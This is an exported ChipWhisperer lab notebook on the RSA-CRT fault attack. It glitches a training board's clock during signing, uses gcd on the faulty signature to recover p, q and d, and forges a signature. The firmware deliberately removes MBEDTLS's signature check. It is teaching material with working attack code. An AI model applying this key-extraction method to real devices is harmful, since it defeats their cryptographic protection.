# Part 2, Topic 1: Fault Attack on RSA (MAIN)

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *So far, we've seen how clock and voltage glitches can be used to disrupt a microcontroller or FPGA, potentially changing the execution path. We've also seen that, in the case of AES, if we disrupt the calculation in a certian spot only twice, we can easily recover a quarter of the key bytes.*

*In this lab, we'll explore an attack on RSA, more specifically an RSA optimization, that can recover the entire key with a single fault.*

**LEARNING OUTCOMES:**

* Understanding conditions for the fault
* Exploring 
* 

## Attack Theory

The theory for this attack is a bit simpler than the one for AES, so we'll take you through it here instead of putting it in another notebook. If you don't know, RSA is an asymmetric cryptographic algorithm, meaning it has a public and private key, with one being used for encryption and the other for decryption. It can be used in both a public encryption/private decryption configuration and a private encryption/public decryption situation. In our case, we'll be attacking the latter case. Let's assume that the target is signing a message and is sending it to us so we can verify the identity of the device.

For RSA, the public key is made up of two numbers, $n$ and $e$. The private key is made up of $n$ and $d$. These numbers have some special properties:

1. $n$ is constructed as the product of 2 prime numbers, $p$ and $q$.
1. $d$ is derived from $p$, $q$, and $e$.

As a result of these properties, a few things are evident:

1. If we learn $p$ or $q$, we can derive the other prime number since $n$ is public information.
1. If we learn $p$ and $q$, we can derive $d$ since $e$ is public information.

The target can encrypt/sign a message with the following equation ($s$ is the signature and $m$ is the message):

$$s = m^d({mod}\space n)$$

And we can decrypt/verify the message with the following equation:

$$s^e = m(mod\space n)$$

One issue with RSA is that it's very slow - these equations are simple, but they use massive numbers; if the numbers used are too small, it's trivial for a computer to factor $n$ into $p$ and $q$. $n$ for the firmware we're attacking is 1024 bits long, which is on the smaller size of secure keys at this point. This encryption/signing operation is especially slow.

## The Chinese Remainder Theorem (CRT)

To help speed up the encryption, an optimization known as the Chinese Remainder Theorem (CRT) can be used. This theorem allows us derive two new exponents, $d_p$ and $d_q$, which are much smaller than $d$. We can then replace

$$s = m^d({mod}\space n)$$

with two equations

$$s_1 = m^{d_p}(mod\ p) \\
s_2 = m^{d_q}(mod\ q)$$

$s_1$ and $s_2$ can be combined into $s$ via CRT. Even though there's two equations, this is still much faster since $d_p$ and $d_q$ are much smaller than $d$. This is the optimization that our target, which is using a slightly modified version of MBEDTLS (more on that later), makes. 

## Inserting a Fault

Suppose that instead of everything going smoothly as above, a fault happens during the calculation of $s_2$. If that happens, the following becomes true (with faulty signatures $s_2'$, which generates $s'$):

$$s'^e = m(mod\ p) \Rightarrow s'^e - m = 0 (mod\ p)$$
$$s'^e \neq m(mod\ q) \Rightarrow s'^e - m \neq 0 (mod\ q)$$

The result of this is that p will be a factor of $s'^e - m$, but q and N will not be. Since p is also a factor of N, what follows is that:

$$p = gcd(s'^e - m, N)$$

The math is similar in the case that $s_1$ is faulted, with the only difference being that we recover $q$ at the end instead of $p$. 

## Communicating with the Target

With the math out of the way, we can get to attacking the target:

In [22]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'

In [23]:
%%bash -s "$PLATFORM"
cd ../../hardware/victims/firmware/simpleserial-rsa
make PLATFORM=$1 CRYPTO_TARGET=MBEDTLS CRYPTO_OPTIONS=RSA OPT=2

SS_VER set to SS_VER_1_1
rm -f -- simpleserial-rsa-CWLITEARM.hex
rm -f -- simpleserial-rsa-CWLITEARM.eep
rm -f -- simpleserial-rsa-CWLITEARM.cof
rm -f -- simpleserial-rsa-CWLITEARM.elf
rm -f -- simpleserial-rsa-CWLITEARM.map
rm -f -- simpleserial-rsa-CWLITEARM.sym
rm -f -- simpleserial-rsa-CWLITEARM.lss
rm -f -- objdir/*.o
rm -f -- objdir/*.lst
rm -f -- simpleserial-rsa.s simpleserial-rsa-xmega.s simpleserial-rsa-arm.s simpleserial.s stm32f3_hal.s stm32f3_hal_lowlevel.s stm32f3_sysmem.s rsa.s bignum.s md.s md5.s md_wrap.s sha1.s sha256.s sha512.s ripemd160.s oid.s
rm -f -- simpleserial-rsa.d simpleserial-rsa-xmega.d simpleserial-rsa-arm.d simpleserial.d stm32f3_hal.d stm32f3_hal_lowlevel.d stm32f3_sysmem.d rsa.d bignum.d md.d md5.d md_wrap.d sha1.d sha256.d sha512.d ripemd160.d oid.d
rm -f -- simpleserial-rsa.i simpleserial-rsa-xmega.i simpleserial-rsa-arm.i simpleserial.i stm32f3_hal.i stm32f3_hal_lowlevel.i stm32f3_sysmem.i rsa.i bignum.i md.i md5.i md_wrap.i sha1.i sha256.i sha512.i

simpleserial-rsa-arm.c: In function 'simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign':
simpleserial-rsa-arm.c:190:28: warning: unused variable 'diff_no_optimize' [-Wunused-variable]
  190 |     volatile unsigned char diff_no_optimize;
      |                            ^~~~~~~~~~~~~~~~
simpleserial-rsa-arm.c:189:19: warning: unused variable 'diff' [-Wunused-variable]
  189 |     unsigned char diff;
      |                   ^~~~
simpleserial-rsa-arm.c:188:12: warning: unused variable 'i' [-Wunused-variable]
  188 |     size_t i;
      |            ^
simpleserial-rsa-arm.c: In function 'real_dec':
simpleserial-rsa-arm.c:344:21: warning: pointer targets in passing argument 1 of 'mbedtls_sha256' differ in signedness [-Wpointer-sign]
  344 |      mbedtls_sha256(MESSAGE, 12, hash, 0);
      |                     ^~~~~~~
      |                     |
      |                     const char *
In file included from simpleserial-rsa-arm.c:28:
.././crypto/mbedtls//include/mbedtls/sha256.h:127:43: 

In [24]:
%run "../Setup_Scripts/Setup_Generic.ipynb"

Traceback (most recent call last):
  File "c:\users\adewa\code\chipwhisperer\software\chipwhisperer\hardware\naeusb\naeusb.py", line 283, in txrx
    self.usbdev().ctrl_transfer(payload[0], payload[1], payload[2], payload[3], payload[5:], timeout=self._timeout)
  File "C:\Users\adewa\Downloads\WPy64-3771\python-3.7.7.amd64\lib\site-packages\usb\core.py", line 1043, in ctrl_transfer
    self.__get_timeout(timeout))
  File "C:\Users\adewa\Downloads\WPy64-3771\python-3.7.7.amd64\lib\site-packages\usb\backend\libusb0.py", line 593, in ctrl_transfer
    timeout
  File "C:\Users\adewa\Downloads\WPy64-3771\python-3.7.7.amd64\lib\site-packages\usb\backend\libusb0.py", line 431, in _check
    raise USBError(errmsg, ret)
usb.core.USBError: [Errno None] b'libusb0-dll:err [control_msg] sending control message failed, win error: The device does not recognize the command.\r\n\n'


INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.
INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.
Serial baud rate = 38400
INFO: Found ChipWhisperer😍


In [25]:
import time
fw_path = "../../hardware/victims/firmware/simpleserial-rsa/simpleserial-rsa-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)
time.sleep(1)

Serial baud rate = 115200
Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to program 25939 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 25939 bytes
Serial baud rate = 38400


This target is using the simpleserial protocol, but the full signature is too big to read back in a single command. This means we instead read back the signature in 3 commands:

1. `'t'` will do the signature calculation and respond with the first 48 bytes of the signature
1. `'1'` will return the next 48 bytes of the signature
1. `'2'` will return the final 32 bytes of the signature

In [26]:
import time
scope.clock.adc_src = "clkgen_x1"
target.flush()
scope.arm()
target.simpleserial_write("t", bytearray([]))
    
ret = scope.capture()
if ret:
    print('Timeout happened during acquisition')
    
time.sleep(2)
output = target.simpleserial_read_witherrors('r', 48, timeout=10)

In [27]:
sig = None
if output['valid']:
    print(output['payload'])
    sig = output['payload']
    
print(scope.adc.trig_count)

CWbytearray(b'4f 09 79 9f 6a 59 08 1b 72 55 99 75 33 30 b7 a2 44 0a bc 42 60 66 01 62 2f e0 c5 82 64 6e 32 55 53 03 e1 06 2a 29 89 d9 b4 c2 65 43 1a db 58 dd')
10828762


That took a long time, probably more than 10M cycles! Let's read back the rest of the message and append it to our signature:

In [28]:
target.simpleserial_write("1", bytearray())
time.sleep(0.2)
output = target.simpleserial_read_witherrors('r', 48, timeout=10)
if output['valid']:
    sig.extend(output['payload'])

target.simpleserial_write("2", bytearray())
time.sleep(0.2)
output = target.simpleserial_read_witherrors('r', 32, timeout=10)
if output['valid']:
    sig.extend(output['payload'])
    
print(sig)

CWbytearray(b'4f 09 79 9f 6a 59 08 1b 72 55 99 75 33 30 b7 a2 44 0a bc 42 60 66 01 62 2f e0 c5 82 64 6e 32 55 53 03 e1 06 2a 29 89 d9 b4 c2 65 43 1a db 58 dd 85 bb 33 c4 bb 23 7a 31 1b c4 0c 12 79 52 8f d6 bb 36 f9 4f 53 4a 4d 82 84 a1 8a b8 e5 67 0e 73 4c 55 a6 cc ab 5f b5 ea e0 2b a3 7e 2d 56 64 8d 7a 13 bb f1 7a 0e 07 d6 07 c0 7c bb 72 c7 a7 a7 70 76 37 6e 84 34 ce 6e 13 68 32 dc 95 db 3d 80')


In [32]:
if PLATFORM == "CWLITEXMEGA":
    def reboot_flush():            
        scope.io.pdic = False
        time.sleep(0.1)
        scope.io.pdic = "high_z"
        time.sleep(0.1)
        #Flush garbage too
        target.flush()
else:
    def reboot_flush():            
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = "high_z"
        time.sleep(0.05)
        #Flush garbage too
        target.flush()

Let's verify that our signature is correct and that we can verify it:

In [29]:
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5 

from Crypto.Hash import SHA256

e = 0x10001
n = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
m = b"Hello World!"

hash_object = SHA256.new(data=m)
pub_key = RSA.construct((n, e))
signer = PKCS1_v1_5.new(pub_key) 
sig_check = signer.verify(hash_object, sig)
print(sig_check)

assert sig_check, "Failed to verify signature on device. Got: {}".format(newout)

True


Now let's setup the glitch module. Use settings here that worked for you before. Ideally, you'll have a single group of settings here - RSA is very slow (as you've seen), so trying to scan settings here would take forever!

In [42]:
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"
scope.glitch.trigger_src = "ext_single"
scope.glitch.repeat = 1
scope.glitch.width = -9
scope.glitch.offset = -38.3
scope.io.hs2 = "glitch"
print(scope.glitch)

clk_src     = clkgen
width       = -8.984375
width_fine  = 0
offset      = -38.28125
offset_fine = 0
trigger_src = ext_single
arm_timing  = after_scope
ext_offset  = 7000037
repeat      = 1
output      = clock_xor



In [55]:
from tqdm import tnrange
import time
for i in tnrange(7000000, 7100000): #look for something kind of near the end
    scope.glitch.ext_offset = i
    scope.adc.timeout = 3
    target.flush()
    scope.arm()
    target.simpleserial_write("t", bytearray([]))

    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')
        reboot_flush()
        time.sleep(0.5)
        continue

    time.sleep(2)
    output = target.simpleserial_read_witherrors('r', 48, timeout=10)
    if output['valid'] is False: # replace with invalid output detection
        print("crash") #we can't really do anything here - we need the full signature back
        reboot_flush()
        time.sleep(0.5)
        continue
    else:
        sig = output['payload']
        target.simpleserial_write("1", bytearray())
        time.sleep(0.1)
        output = target.simpleserial_read_witherrors('r', 48, timeout=10)
        if output['valid']:
            sig.extend(output['payload'])
        else:
            print("couldn't read 1 cmd")
            continue

        target.simpleserial_write("2", bytearray())
        time.sleep(0.1)
        output = target.simpleserial_read_witherrors('r', 32, timeout=10)
        if output['valid']:
            sig.extend(output['payload'])
        else:
            print("Couldn't read 2 cmd")
            continue
        sig_check = signer.verify(hash_object, sig)
        if sig_check is False: #detect if the calculation was messed up
            # call the faulty signature whatever you want
            # but we'll assume it's called sig for the rest of the lab
            print("Glitched!")
            sig = sig
            break
        else:
            pass # normal operation, nothing special

C:\Users\adewa\Downloads\WPy64-3771\python-3.7.7.amd64\lib\site-packages\ipykernel_launcher.py:3: TqdmDeprecationWarning: Please use `tqdm.notebook.trange` instead of `tqdm.tnrange`
  This is separate from the ipykernel package so we can avoid doing imports until


crash
crash
crash
crash
crash
crash
crash
Glitched!



In [ ]:
from tqdm import tnrange
import time
for i in tnrange(7000000, 7100000): #look for something kind of near the end
    scope.glitch.ext_offset = i
    scope.adc.timeout = 3
    target.flush()
    scope.arm()
    target.simpleserial_write("t", bytearray([]))

    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    time.sleep(2)
    output = target.simpleserial_read_witherrors('r', 48, timeout=10)
    if invalid_output: # replace with invalid output detection
        print("crash") #we can't really do anything here - we need the full signature back
    else:
        if glitched_output: #detect if the calculation was messed up
            # call the faulty signature whatever you want
            # but we'll assume it's called sig for the rest of the lab
            sig = 
        else:
            pass # normal operation, nothing special

## Padding the Message

We've got our glitched signature, but we've still got a little work to do. The $m$ isn't actually the message by itself. Instead, it's a PKCS#1 v1.5 padded hash of it. Luckily, this standard's fairly simple. PKCS#1 v1.5 padding looks like:

\|00\|01\|ff...\|00\|hash_prefix\|message_hash\|

Here, the ff... part is a string of ff bytes long enough to make the size of the padded message the same as N, while hash_prefix is an identifier number for the hash algorithm used on message_hash. Our message was hashed using SHA256, which has the hash prefix `3031300d060960864801650304020105000420`.

We can get our hashed message and $m$ with the following code:

In [56]:
from Crypto.Hash import SHA256
from binascii import hexlify, unhexlify

def build_message(m, n):
    sha_id = "3031300d060960864801650304020105000420"
    N_len = (len(bin(n)) - 2 + 7) // 8
    pad_len = (len(hex(n)) - 2) // 2 - 3 - len(m)//2 - len(sha_id)//2
    padded_m = "0001" + "ff" * pad_len + "00" + sha_id + m
    return padded_m

hashed_m = hexlify(hash_object.digest()).decode()
padded_m = build_message(hashed_m, n)
print(hashed_m)
print(padded_m)

7f83b1657ff1fc53b92dc18148a1d65dfc2d4b1fa3d677284addd200126d9069
0001ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff003031300d0609608648016503040201050004207f83b1657ff1fc53b92dc18148a1d65dfc2d4b1fa3d677284addd200126d9069


## Recovering the Private Key

Now we can recover the private values by plugging them into the equations from earlier. If you can, install the gmpy2 Python library, which has much better support for big integer math like this. Otherwise, run the next block and wait for a few minutes for the calculation to finish.

You can get gmpy2 on Windows from the following link: https://pypi.org/project/gmpy2/#files. On Linux, you can install it via your package manager (python3-gmpy2 on Apt, for example).

In [ ]:
from math import gcd
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
e = 0x10001
try:
    import gmpy2
    from gmpy2 import mpz
    sig_int = mpz(int.from_bytes(sig, "big"))
    m_int = mpz(int.from_bytes(unhexlify(padded_m), "big"))
    p_test = gmpy2.gcd(sig_int**e - m_int, N)
except (ImportError, ModuleNotFoundError) as error:
    print("gmpy2 not found, falling back to Python")
    sig_int = int.from_bytes(sig, "big")
    padded_m_int = int.from_bytes(unhexlify(padded_m), "big")
    a = int.from_bytes(sig, "big")**e - int.from_bytes(unhexlify(padded_m), "big")
    p_test = gcd(a, N)
    
print(hex(p_test))

We should now have either $p$ or $q$! We can get the other prime by simply dividing $n$ by the one we have.

In [52]:
q_test = n//p_test
print(hex(q_test))

0xc000df51a7c77ae8d7c7370c1ff55b69e211c2b9e5db1ed0bf61d0d9899620f4910e4168387e3c30aa1e00c339a795088452dd96a9a5ea5d9dca68da636032af


The $d$ calculation is a bit more complicated. Here's some code to derive it from $q$, $p$, and $e$:

In [53]:
phi = (q_test - 1)*(p_test - 1)
def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
        gcd = b
    return gcd, x, y

gcd, d, b = egcd(e, phi)

print(hex(d))

0x24bf6185468786fdd303083d25e64efc66ca472bc44d253102f8b4a9d3bfa75091386c0077937fe33fa3252d28855837ae1b484a8a9a45f7ee8c0c634f99e8cddf79c5ce07ee72c7f123142198164234cabb724cf78b8173b9f880fc86322407af1fedfdde2beb674ca15f3e81a1521e071513a1e85b5dfa031f21ecae91a34d


Let's sign the original message and see if we can verify it with our original verifier:

In [66]:
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5 

from Crypto.Hash import SHA256

private_key = RSA.construct((n, e, int(d), int(p_test), int(q_test)))
private_signer = PKCS1_v1_5.new(private_key) 
new_sig = private_signer.sign(hash_object)
print(sig)

new_sig_check = signer.verify(hash_object, new_sig)
print(new_sig_check)

assert new_sig_check, "Failed to verify signature on device. Got: {}".format(newout)

CWbytearray(b'75 81 99 f0 1b 83 0f 9d d8 fc 33 68 84 39 71 ba 5d 62 a0 c4 51 9f 01 44 ec 54 a8 03 91 bb 7d 44 ad 97 ee 3f 7e 56 7e ca 80 83 fe 6d 31 5c 56 2b e8 2c d0 b5 43 d9 b8 16 dc 14 a7 c8 0b bf a1 07 e2 c3 4b 1e a9 f0 db ad 1c a6 19 01 d8 79 b9 04 0a 93 e0 c6 d5 af 5e ba 35 47 39 37 84 77 63 30 52 5f db bc ee 8e 72 1b c4 0a 5e 15 96 29 c5 75 c6 33 ac 95 07 5b 58 4e 25 fc 1e 6c 77 87 46 46')
True


Now that you've seen the attack work, you might want to try doing the falut in the other half of the RSA calculation to see if you can get the other prime number back.

## Caveats to the Attack

We mentioned earlier that this is a slightly modified MBEDTLS implementation. The modification made was to remove a verification check to prevent exactly this type of attack:

```C
    /* Compare in constant time just in case */
    /* for( diff = 0, i = 0; i < ctx->len; i++ ) */
    /*     diff |= verif[i] ^ sig[i]; */
    /* diff_no_optimize = diff; */

    /* if( diff_no_optimize != 0 ) */
    /* { */
    /*     ret = MBEDTLS_ERR_RSA_PRIVATE_FAILED; */
    /*     goto cleanup; */
    /* } */
```

That doesn't mean that our attack is impossible though! It just means that we have to glitch both the signature calculation and this signature check.

## Acknowledgements

This attack is was originally detailed in a [1997 paper by Boneh, Demillo, and Lipton](https://www.researchgate.net/publication/2409434_On_the_Importance_of_Checking_Computations). This tutorial draws heavily from a blog post by David Wong, which you can find [here](https://www.cryptologie.net/article/371/fault-attacks-on-rsas-signatures/).